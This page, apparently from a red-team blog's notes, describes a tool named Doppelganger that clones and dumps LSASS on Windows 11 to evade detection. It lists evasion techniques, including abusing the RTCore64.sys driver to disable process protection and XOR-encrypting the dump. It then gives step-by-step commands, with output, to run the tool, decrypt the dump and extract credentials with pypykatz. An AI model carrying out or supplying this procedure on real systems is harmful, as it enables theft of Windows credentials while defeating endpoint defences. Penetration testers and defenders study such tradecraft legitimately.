Doppelganger: Cloning and Dumping LSASS (Win11)

LogoDoppelganger: Cloning and Dumping LSASS to Evade Detectionvari.sh's Blog

  • Dynamic API resolution with obfuscation

  • SYSTEM token manipulation

  • Process cloning with NtCreateProcessEx

  • Direct memory access via RTCore64.sys to disable PPL

  • XOR encryption for stealth dump writing on disk

  1. Doppelganger.exe (execute)

  2. put the driver into the Public Folder: (RTCore64.sys)

  3. Execute: Doppelganger.exe

  4. user the xor python script to unxored the created dump: https://github.com/vari-sh/RedTeamGrimoire/blob/main/Doppelganger/utils/decrypt_xor_dump.py ──(kali㉿kali)-[~/Downloads] └─$ python xored.py doppelganger.dmp [+] Decryption successful. Output written to: doppelganger.dmp.dec

  5. use pypykatz to get the credentials ┌──(kali㉿kali)-[~/Downloads] └─$ pypykatz lsa minidump doppelganger.dmp.dec

PreviousExtracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuiteNextRecovery lsass.dmp from Defender Quarantine

Last updated

Was this helpful?